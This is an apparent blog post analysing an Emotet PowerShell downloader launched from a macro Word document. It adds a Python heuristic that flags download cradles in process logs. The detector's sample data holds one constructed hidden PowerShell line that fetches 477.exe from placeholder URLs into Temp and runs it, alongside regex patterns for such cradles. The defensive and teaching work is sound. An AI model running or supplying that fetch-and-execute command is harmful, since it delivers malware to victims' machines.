Today I wanted to do a real quick post on a PowerShell downloader linked to Emotet. Here is a little background on what Emotet is according to Malwarebytes:
Emotet is a Trojan that is primarily spread through spam emails. The infection may arrive either via malicious script, macro-enabled document files, or malicious link. Emotet emails may contain familiar branding designed to look like a legitimate email. Emotet may try to persuade users to click the malicious files by using tempting language about “Your Invoice,” “Payment Details,” or possibly an upcoming shipment from well-known parcel companies.
The strain I will be looking at was delivered through a Word document acquired from https://www.malware-traffic-analysis.net/2019/01/18/index.html
Once the macros inside the document are launched by enabling content, cmd.exe spawns a PowerShell process.
Let's take a look at the contents of the PowerShell script that was kicked off.
So here we can see that it is building a PowerShell download cradle that iterates through the listed URLs, attempting to download 477.exe and save it to the AppData\Local\Temp directory. Here is a look at what some of the variables contain.
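The structure described above (a WebClient, a loop over a list of URLs, a DownloadFile into the user's Temp directory, then execution of the dropped file) is also what a defender can key on. The following is an added detection example, not code from the original post or from the malware: it scores process command lines, as they would be exported from process-creation logging (Sysmon Event ID 1 or Security 4688), against a small set of cradle indicators. The indicator regexes, the threshold, and the three sample command lines are my own constructions; the hosts in them are .invalid placeholders, not IoCs from the post.

```python
"""Heuristic flagging of PowerShell download cradles in process command lines.

Added example (not code from the original post). Assumes the command lines
have already been pulled out of process-creation logs (Sysmon EID 1 / 4688);
the sample lines below are constructed and the hosts are placeholders.
"""
import re
from typing import Dict, List, Tuple

# Each indicator is a case-insensitive regex over one command line.
# The names and patterns are assumptions chosen for this example.
INDICATORS: Dict[str, "re.Pattern[str]"] = {
    "webclient":       re.compile(r"new-object\s+(system\.)?net\.webclient", re.I),
    "downloadfile":    re.compile(r"\.downloadfile\(|invoke-webrequest|\biwr\b", re.I),
    "temp_path":       re.compile(r"\$env:temp|appdata\\+local\\+temp", re.I),
    "url_list_loop":   re.compile(r"foreach\s*\(.*\bin\b.*\)|\.split\(['\"]@['\"]\)", re.I),
    "exec_dropped":    re.compile(r"start-process|invoke-item|\bsaps\b|\biex\b|invoke-expression", re.I),
    "hidden_noprofile": re.compile(r"-(w(indowstyle)?\s+hidden|nop(rofile)?\b|e(nc|ncodedcommand)?\b)", re.I),
    "exec_bypass":     re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I),
    "try_catch_loop":  re.compile(r"\btry\s*\{.*\bbreak\b.*\}\s*catch", re.I | re.S),
}

# Constructed sample command lines (not captured data). The first mimics the
# cradle structure described in the post; the other two are benign admin usage.
SAMPLE_COMMAND_LINES: List[str] = [
    "powershell -nop -w hidden -ep bypass -c \"$u='http://one.invalid/x/@http://two.invalid/y/'.Split('@');"
    "$p=$env:TEMP+'\\477.exe';$c=New-Object System.Net.WebClient;"
    "foreach($x in $u){try{$c.DownloadFile($x,$p);Start-Process $p;break}catch{}}\"",
    "powershell -c \"Invoke-WebRequest https://intranet.invalid/cfg.json -OutFile C:\\ProgramData\\app\\cfg.json\"",
    "powershell -c \"Get-Service | Where-Object Status -eq 'Running'\"",
]


def matched_indicators(cmdline: str) -> List[str]:
    """Return the names of every indicator whose regex hits the command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]


def cradle_score(cmdline: str) -> int:
    """Simple unweighted score: number of distinct indicators matched."""
    return len(matched_indicators(cmdline))


def is_download_cradle(cmdline: str, threshold: int = 3) -> bool:
    """Flag only when a network fetch is present AND enough supporting
    indicators co-occur, so a lone Invoke-WebRequest in an admin script
    does not fire. The threshold of 3 is an assumption to tune per estate."""
    hits = matched_indicators(cmdline)
    fetches = "webclient" in hits or "downloadfile" in hits
    return fetches and len(hits) >= threshold


def triage(cmdlines: List[str]) -> List[Tuple[bool, List[str]]]:
    """Run every command line through the heuristic; returns (flagged, hits)."""
    return [(is_download_cradle(c), matched_indicators(c)) for c in cmdlines]


if __name__ == "__main__":
    for flagged, hits in triage(SAMPLE_COMMAND_LINES):
        print("CRADLE" if flagged else "ok    ", hits)
```

In practice the command lines would come from a SIEM export rather than the inline list, and the `hidden_noprofile` and `exec_bypass` indicators are the ones most worth checking against your own baseline, since some legitimate automation also uses them.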
So thank you for reading and until next time…